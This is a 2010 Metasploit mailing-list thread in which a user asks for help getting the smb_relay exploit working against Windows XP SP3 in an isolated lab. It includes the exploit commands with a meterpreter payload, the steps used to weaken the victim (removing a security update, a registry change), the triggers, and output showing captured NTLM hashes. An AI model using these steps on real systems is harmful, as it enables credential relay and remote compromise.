Metasploit mailing list archives

Re: smb_relay returns "[-] Failed to authenticate"


From: Christian Schäfer <syrious3000 () hotmail de>
Date: Thu, 30 Dec 2010 17:35:04 +0100


Hi there,

just set up two clean xp sp3 machines and got the following:

[*] Received 192.168.69.4:1116 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.69.4:1116 \
[*] Received 192.168.69.4:1118 SYRPLAY\test LMHASH:c502f5a4332271c33115639a412aaaacd121fd3f95a5a20d NTHASH:ccf6089244fabbbefcdaecd051d5ebd081782e123f7f73aa OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.69.4 as SYRPLAY\test...
[*] AUTHENTICATED as SYRPLAY\test...
[*] Ignoring request from 192.168.69.4, attack already in progress.
[*] Sending Access Denied to 192.168.69.4:1118 SYRPLAY\test

Looks nice... but when I type "sessions -l" there are no sessions. Do you have a clue for that?

From: syrious3000 () hotmail de
To: framework () spool metasploit com
Date: Wed, 29 Dec 2010 20:18:03 +0100
Subject: [framework] smb_relay returns "[-] Failed to authenticate"








Hello,


I'm just trying to get the smb_relay exploit working on an isolated test setup consisting of 2 Win XP SP3 machines with Metasploit Framework 3.5.1, for demonstration purposes.

attacker: 192.168.69.7 
victim: 192.168.69.3


To get the exploit working I uninstalled the Win Security Update KB957097 (from both machines) which prevents the 
exploit.

After that I set LocalSecuritySettings / LocalPolicies / SecurityOptions / NetworkAccess: Sharing and Security model for local accounts to: "Classic" on the victim.

Then I executed:  gpupdate /force in windows shell


On the attacking machine I set following network config:

tcp/ip / advanced/wins:  disabled (to get port 139 free)

client for ms networks:   enabled

file & printer sharing...:  enabled

I made a change in the registry (to get port 445 free) by setting:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] 
"SMBDeviceEnabled"=dword:00000000


I executed the exploit with the following commands and got a "Failed to authenticate" ...please help :(
(SYRDSL = computer name , test = username and password)

msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(smb_relay) > set SRVHOST 192.168.69.7
SRVHOST => 192.168.69.7
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
[*] Started bind handler
[*] Server started.
[*] Received 192.168.69.3:1079 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.69.3:1079 \
[*] Received 192.168.69.3:1079 SYRDSL\test LMHASH:3e5a5ee7d3fd22d72fc039c755c14c9c33eb1778f2f939cc NTHASH:1934e7b2bfe1bd8979b505fdcfbc03cc44bd94334991444b OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.69.3 as SYRDSL\test...
[*] Trying to AUTHENTICATE: username= test , domain= SYRDSL
[-] Failed to authenticate as SYRDSL\test...


On the victim machine I tried:

typing in the explorer address line:  \\192.168.69.7\fakeShare\fakeFile.jpg

or in windows shell: net use \\192.168.69.7\ipc$ to trigger the exploit 



I would appreciate any hint... because I urgently need to get it working... please help :/
If I missed some important information, please tell me and I will provide it.

Cheers
Christian
                                          

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework                                    